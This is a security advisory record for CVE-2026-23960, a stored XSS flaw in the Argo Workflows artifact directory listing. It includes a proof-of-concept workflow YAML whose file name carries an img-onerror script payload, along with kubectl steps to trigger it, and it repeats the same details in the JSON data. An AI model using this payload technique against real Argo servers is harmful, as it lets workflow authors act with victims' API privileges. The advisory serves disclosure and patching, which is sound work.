GHSA-CV78-6M8Q-PH82

Vulnerability from github – Published: 2026-01-21 22:00 – Updated: 2026-01-22 15:39
VLAI?
Summary
Argo Workflows affected by stored XSS in the artifact directory listing
Details

Summary

Stored XSS in the artifact directory listing allows any workflow author to execute arbitrary JavaScript in another user’s browser under the Argo Server origin, enabling API actions with the victim’s privileges.

Details

The directory listing response in server/artifacts/artifact_server.go renders object names directly into HTML via fmt.Fprintf without escaping. Object names come from driver.ListObjects(...) and are attacker‑controlled when a workflow writes files into an output artifact directory.

https://github.com/argoproj/argo-workflows/blob/9872c296d29dcc5e9c78493054961ede9fc30797/server/artifacts/artifact_server.go#L194-L244

PoC

  1. Deploy Argo Workflows:
kubectl create ns argo
kubectl apply --server-side -f manifests/base/crds/full
kubectl apply --server-side -k manifests/quick-start/postgres
  1. Port‑forward Argo Server:
kubectl -n argo port-forward deploy/argo-server 2746:2746
  1. Create the PoC workflow:
cat > /tmp/argo-xss.yaml <<'EOF'
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  generateName: xss-artifact-test-
spec:
  entrypoint: main
  templates:
  - name: main
    container:
      image: alpine
      command: [sh, -c]
      args:
      - |
        mkdir -p /tmp/artifacts
        touch '/tmp/artifacts/xss"><img src=x onerror="alert(document.domain)">.html'
    outputs:
      artifacts:
      - name: dir
        path: /tmp/artifacts
        archive:
          none: {}
EOF

kubectl -n argo create -f /tmp/argo-xss.yaml
  1. Wait for completion:
kubectl -n argo get wf -w
  1. Get the node ID:
kubectl -n argo get wf <wf-name> \
  -o jsonpath='{range .status.nodes.*}{.id}{"\t"}{.displayName}{"\n"}{end}'
  1. Open the listing: https://localhost:2746/artifact-files/argo/workflows/<wf-name>/<node-id>/outputs/dir/

image

Impact

  • The attacker creates a workflow that produces a HTML artifact that contains a HTML file that contains a script which uses XHR calls to interact with the Argo Server API.
  • The attacker emails the deep-link to the artifact to their victim. The victim opens the link, the script starts running.

As the script has access to the Argo Server API (as the victim), so may do the following (if the victim may): - Read information about the victim’s workflows. - Create or delete workflows.

Severity ?
7.3 (High)
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-workflows/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.6.17"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.7.7"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-workflows/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.7.0"
            },
            {
              "fixed": "3.7.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-workflows"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.5.3-rc4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-23960"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-21T22:00:38Z",
    "nvd_published_at": "2026-01-21T22:15:50Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nStored XSS in the artifact directory listing allows any workflow author to execute arbitrary JavaScript in another user\u2019s browser under the Argo Server origin, enabling API actions with the victim\u2019s privileges.\n\n### Details\nThe directory listing response in `server/artifacts/artifact_server.go` renders object names directly into HTML via `fmt.Fprintf` without escaping. Object names come from `driver.ListObjects(...)` and are attacker\u2011controlled when a workflow writes files into an output artifact directory.\n\nhttps://github.com/argoproj/argo-workflows/blob/9872c296d29dcc5e9c78493054961ede9fc30797/server/artifacts/artifact_server.go#L194-L244\n\n### PoC\n1. Deploy Argo Workflows:\n```\nkubectl create ns argo\nkubectl apply --server-side -f manifests/base/crds/full\nkubectl apply --server-side -k manifests/quick-start/postgres\n```\n2. Port\u2011forward Argo Server:\n```\nkubectl -n argo port-forward deploy/argo-server 2746:2746\n```\n3. Create the PoC workflow:\n```yml\ncat \u003e /tmp/argo-xss.yaml \u003c\u003c\u0027EOF\u0027\napiVersion: argoproj.io/v1alpha1\nkind: Workflow\nmetadata:\n  generateName: xss-artifact-test-\nspec:\n  entrypoint: main\n  templates:\n  - name: main\n    container:\n      image: alpine\n      command: [sh, -c]\n      args:\n      - |\n        mkdir -p /tmp/artifacts\n        touch \u0027/tmp/artifacts/xss\"\u003e\u003cimg src=x onerror=\"alert(document.domain)\"\u003e.html\u0027\n    outputs:\n      artifacts:\n      - name: dir\n        path: /tmp/artifacts\n        archive:\n          none: {}\nEOF\n```\n```\nkubectl -n argo create -f /tmp/argo-xss.yaml\n```\n4. Wait for completion:\n```\nkubectl -n argo get wf -w\n```\n5. Get the node ID:\n```\nkubectl -n argo get wf \u003cwf-name\u003e \\\n  -o jsonpath=\u0027{range .status.nodes.*}{.id}{\"\\t\"}{.displayName}{\"\\n\"}{end}\u0027\n```\n6. Open the listing:\n`https://localhost:2746/artifact-files/argo/workflows/\u003cwf-name\u003e/\u003cnode-id\u003e/outputs/dir/`\n\n\u003cimg width=\"1220\" height=\"349\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9d859826-c7cd-403b-988e-74695552944b\" /\u003e\n\n### Impact\n- The attacker creates a workflow that produces a HTML artifact that contains a HTML file that contains a script which uses XHR calls to interact with the Argo Server API.\n- The attacker emails the deep-link to the artifact to their victim. The victim opens the link, the script starts running.\n\nAs the script has access to the Argo Server API (as the victim), so may do the following (if the victim may):\n- Read information about the victim\u2019s workflows.\n- Create or delete workflows.",
  "id": "GHSA-cv78-6m8q-ph82",
  "modified": "2026-01-22T15:39:57Z",
  "published": "2026-01-21T22:00:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cv78-6m8q-ph82"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23960"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-workflows/commit/159a5c56285ecd4d3bb0a67aeef4507779a44e17"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/argoproj/argo-workflows"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-workflows/blob/9872c296d29dcc5e9c78493054961ede9fc30797/server/artifacts/artifact_server.go#L194-L244"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-workflows/releases/tag/v3.6.17"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-workflows/releases/tag/v3.7.8"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Argo Workflows affected by stored XSS in the artifact directory listing"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.